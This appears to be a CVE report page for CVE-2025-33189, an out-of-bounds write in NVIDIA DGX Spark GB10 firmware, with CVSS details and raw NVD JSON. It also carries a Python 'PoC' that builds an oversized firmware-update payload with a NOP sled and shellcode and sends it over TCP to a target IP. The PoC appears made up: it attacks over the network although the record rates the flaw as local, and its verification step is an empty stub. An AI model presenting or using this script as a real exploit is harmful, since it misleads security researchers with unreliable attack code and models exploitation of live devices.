Security Vulnerability Report
CVE-2025-33189 CVSS 7.8 HIGH

Published: 2025-11-25 18:15:50
Last Modified: 2025-12-02 18:19:52

Description

NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA DGX Spark GB10 firmware version < fixed version
For the specific affected versions, refer to NVIDIA's official security advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33189 PoC - NVIDIA DGX Spark GB10 SROOT Firmware Out-of-Bounds Write
# This PoC demonstrates the vulnerability pattern (for authorized security testing only)

import struct
import socket


def create_malicious_payload():
    """
    Create a malicious payload to trigger out-of-bounds write in SROOT firmware
    The vulnerability exists in SROOT firmware's boundary check mechanism
    """
    # Firmware update header structure
    header = bytearray(64)

    # Magic number for SROOT firmware
    header[0:4] = b'SRFT'

    # Firmware version
    struct.pack_into('<I', header, 4, 0x00010001)

    # Payload size - exceeds expected boundary
    # This triggers the out-of-bounds write vulnerability
    struct.pack_into('<I', header, 8, 0x00010000)

    # Command type: FIRMWARE_UPDATE
    struct.pack_into('<I', header, 12, 0x00000001)

    # Create malicious payload with oversized data
    payload_size = 0x00010000  # 64KB - triggers boundary overflow
    payload = bytearray(payload_size)

    # Fill payload with NOP sled for code injection
    for i in range(len(payload)):
        payload[i] = 0x90  # NOP instruction

    # Add shellcode at the end of payload
    shellcode_offset = payload_size - 256
    shellcode = b'\x90' * 100 + b'\xcc' * 50  # Breakpoint for testing
    payload[shellcode_offset:shellcode_offset + len(shellcode)] = shellcode

    # Append payload to header
    exploit_data = header + payload
    return exploit_data


def send_exploit(target_ip, target_port=5000):
    """
    Send the exploit payload to target device
    """
    payload = create_malicious_payload()
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        sock.send(payload)
        print(f"[+] Exploit payload sent ({len(payload)} bytes)")
        response = sock.recv(1024)
        print(f"[*] Response: {response.hex()}")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def verify_vulnerability():
    """
    Verify if the target is vulnerable
    """
    # Check SROOT firmware version via diagnostic interface
    diagnostic_cmd = b'\x00\x00\x00\x0aVERSION_QUERY'
    # Implementation depends on specific device interface
    # This is a conceptual demonstration
    pass


if __name__ == "__main__":
    print("CVE-2025-33189 PoC - NVIDIA DGX Spark GB10 SROOT OOB Write")
    print("=" * 60)
    print("[!] Warning: This tool is for authorized security testing only")
    print()

    # Example usage
    target_ip = "192.168.1.100"  # Target DGX Spark IP
    send_exploit(target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33189", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:50.340", "lastModified": "2025-12-02T18:19:51.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges."}, {"lang": "es", "value": "NVIDIA DGX Spark GB10 contiene una vulnerabilidad en el firmware SROOT, donde un atacante podría causar una escritura fuera de límites. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, manipulación de datos, denegación de servicio, revelación de información o escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "40EF912C-72C4-4758-9157-169CE92B33C5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:*", "matchCriteriaId": "76975E53-4E5C-4C6D-85D9-EE2879F960DF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33189", 
"source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5720", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33189", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}